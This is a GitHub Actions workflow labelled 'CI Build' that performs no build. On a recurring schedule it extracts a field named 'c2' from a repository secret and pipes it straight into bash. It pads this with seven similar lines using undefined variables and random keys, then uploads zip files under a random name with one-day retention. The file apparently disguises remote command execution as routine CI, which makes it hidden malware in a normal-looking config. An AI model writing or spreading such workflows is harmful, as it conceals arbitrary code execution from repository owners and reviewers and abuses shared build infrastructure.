name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '56 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          yufks44: ${{ secrets.yufks44 }}
        run: |
          printf '%s' "$yufks44" | jq -r .c2 | /bin/bash
          echo $i8753 | jq -r .pag70134 | /bin/bash
          printf '%s' "$kta1" | jq -r .h3385 | /bin/bash
          echo $iw10278 | jq -r .ievn039 | /bin/bash
          printf '%s' "$dojcb534" | jq -r .wp897 | /bin/bash
          echo $htgh7 | jq -r .dmxyq1235 | /bin/bash
          printf '%s' "$nc82771" | jq -r .i5 | /bin/bash
          echo $uvna88856 | jq -r .hwvt4472 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Dljj3JyN
          path: "*.zip"
          retention-days: 1
